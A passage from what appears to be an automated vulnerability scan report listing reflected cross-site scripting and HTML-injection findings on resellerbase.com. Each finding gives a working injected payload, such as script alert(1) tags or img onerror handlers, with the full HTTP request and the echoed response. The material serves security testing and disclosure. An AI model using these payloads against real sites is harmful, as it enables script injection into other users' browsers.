Host:   http://www.resellerbase.com
Path:   /get_rated.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67f0a<script>alert(1)</script>77c57e55ca414477e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Request

GET /get_rated.php67f0a<script>alert(1)</script>77c57e55ca414477e?query=555-555-0199@example.com&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /get_rated.php67f0a<script>alert(1)</script>77c57e55ca414477e?query=555-555-0199@example.com&pflag=search&submit=Search was not found on this server.</p>
...[SNIP]...

2.3827. http://www.resellerbase.com/get_rated.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /get_rated.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c39da"><img%20src%3da%20onerror%3dalert(1)>b4e58eaaef7 was submitted in the id parameter. This input was echoed as c39da\"><img src=a onerror=alert(1)>b4e58eaaef7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /get_rated.php?id=555-555-0199@example.comc39da"><img%20src%3da%20onerror%3dalert(1)>b4e58eaaef7&pflag=view&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 18345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>How to Get Rated</ti
...[SNIP]...
<a href="http://www.resellerbase.com/detail.php?id=555-555-0199@example.comc39da\"><img src=a onerror=alert(1)>b4e58eaaef7">
...[SNIP]...

2.3828. http://www.resellerbase.com/get_rated.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /get_rated.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 67ec4<img%20src%3da%20onerror%3dalert(1)>0ff1397e88c was submitted in the id parameter. This input was echoed as 67ec4<img src=a onerror=alert(1)>0ff1397e88c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /get_rated.php?id=555-555-0199@example.com67ec4<img%20src%3da%20onerror%3dalert(1)>0ff1397e88c&pflag=view&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 18321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>How to Get Rated</ti
...[SNIP]...
<br />
&lt;a href="http://www.resellerbase.com/detail.php?id=555-555-0199@example.com67ec4<img src=a onerror=alert(1)>0ff1397e88c">
...[SNIP]...

2.3829. http://www.resellerbase.com/get_rated.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /get_rated.php

Issue detail

The value of the query request parameter is copied into the HTML document as text between TITLE tags. The payload 252ab</title><img%20src%3da%20onerror%3dalert(1)>e35c61397324568b6 was submitted in the query parameter. This input was echoed as 252ab</title><img src=a onerror=alert(1)>e35c61397324568b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Request

GET /get_rated.php?query=555-555-0199@example.com252ab</title><img%20src%3da%20onerror%3dalert(1)>e35c61397324568b6&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-555-0199@example.com252ab</title><img src=a onerror=alert(1)>e35c61397324568b6</title>
...[SNIP]...

2.3830. http://www.resellerbase.com/get_rated.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /get_rated.php

Issue detail

The value of the query request parameter is copied into the HTML document as plain text between tags. The payload 5b0ea<img%20src%3da%20onerror%3dalert(1)>c2fae72f813da161e was submitted in the query parameter. This input was echoed as 5b0ea<img src=a onerror=alert(1)>c2fae72f813da161e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Request

GET /get_rated.php?query=555-555-0199@example.com5b0ea<img%20src%3da%20onerror%3dalert(1)>c2fae72f813da161e&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8285

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-5
...[SNIP]...
<b>555-555-0199@example.com5b0ea<img src=a onerror=alert(1)>c2fae72f813da161e</b>
...[SNIP]...

2.3831. http://www.resellerbase.com/get_rated.php [query parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /get_rated.php

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64a21"><img%20src%3da%20onerror%3dalert(1)>7ccf27f6790e384da was submitted in the query parameter. This input was echoed as 64a21\"><img src=a onerror=alert(1)>7ccf27f6790e384da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Request

GET /get_rated.php?query=555-555-0199@example.com64a21"><img%20src%3da%20onerror%3dalert(1)>7ccf27f6790e384da&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/get_rated.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:00:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-5
...[SNIP]...
<input type="text" name="keyword" size="20"

value="555-555-0199@example.com64a21\"><img src=a onerror=alert(1)>7ccf27f6790e384da"
/>
...[SNIP]...

2.3832. http://www.resellerbase.com/goods-wholesale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cdf5<script>alert(1)</script>a40d520823f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale8cdf5<script>alert(1)</script>a40d520823f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale8cdf5<script>alert(1)</script>a40d520823f/ was not found on this server.</p>
...[SNIP]...

2.3833. http://www.resellerbase.com/goods-wholesale/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55182<script>alert(1)</script>3ee46886f263c6008 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method to enable easier demonstration and delivery of the attack.

Request

GET /goods-wholesale55182<script>alert(1)</script>3ee46886f263c6008/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale55182<script>alert(1)</script>3ee46886f263c6008/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.3834. http://www.resellerbase.com/goods-wholesale/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d751d<script>alert(1)</script>33b01808361 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/?d751d<script>alert(1)</script>33b01808361=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/?d751d<script>alert(1)</script>33b01808361=1 was not found on this server.</p>
...[SNIP]...

2.3835. http://www.resellerbase.com/goods-wholesale/ [select parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload cbc3d<a>815a3180791 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fcbc3d<a>815a3180791 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:40:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252fcbc3d<a>815a3180791 was not found on this server.</p>
...[SNIP]...

2.3836. http://www.resellerbase.com/goods-wholesale/googlepr.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98493<script>alert(1)</script>ab4b8bb65dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale98493<script>alert(1)</script>ab4b8bb65dd/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale98493<script>alert(1)</script>ab4b8bb65dd/googlepr.php was not found on this server.</p>
...[SNIP]...

2.3837. http://www.resellerbase.com/goods-wholesale/googlepr.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23a91<script>alert(1)</script>ac7791c9e9a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/googlepr.php23a91<script>alert(1)</script>ac7791c9e9a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/googlepr.php23a91<script>alert(1)</script>ac7791c9e9a was not found on this server.</p>
...[SNIP]...

2.3838. http://www.resellerbase.com/goods-wholesale/googlepr.php [link_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload a302d<a>655151937b8 was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/googlepr.php?link_id=6a302d<a>655151937b8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:44:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/googlepr.php?link_id=6a302d<a>655151937b8 was not found on this server.</p>
...[SNIP]...

2.3839. http://www.resellerbase.com/goods-wholesale/googlepr.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a6f0e<script>alert(1)</script>21347485407 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/googlepr.php?a6f0e<script>alert(1)</script>21347485407=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/googlepr.php?a6f0e<script>alert(1)</script>21347485407=1 was not found on this server.</p>
...[SNIP]...

2.3840. http://www.resellerbase.com/goods-wholesale/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ef0a<script>alert(1)</script>ca6fb78cb81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale3ef0a<script>alert(1)</script>ca6fb78cb81/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale3ef0a<script>alert(1)</script>ca6fb78cb81/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3841. http://www.resellerbase.com/goods-wholesale/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5451f<script>alert(1)</script>3f5fa19f36d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/search.php5451f<script>alert(1)</script>3f5fa19f36d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/search.php5451f<script>alert(1)</script>3f5fa19f36d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3842. http://www.resellerbase.com/goods-wholesale/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 6d834<a>6ede6217f4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/search.php?keyword=search...&Submit3=Search6d834<a>6ede6217f4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/search.php?keyword=search...&Submit3=Search6d834<a>6ede6217f4&opt=2 was not found on this server.</p>
...[SNIP]...

2.3843. http://www.resellerbase.com/goods-wholesale/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 90010<a>ed8ede9d9de was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/search.php?keyword=search...90010<a>ed8ede9d9de&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/search.php?keyword=search...90010<a>ed8ede9d9de&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3844. http://www.resellerbase.com/goods-wholesale/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/search.php

Issue detail

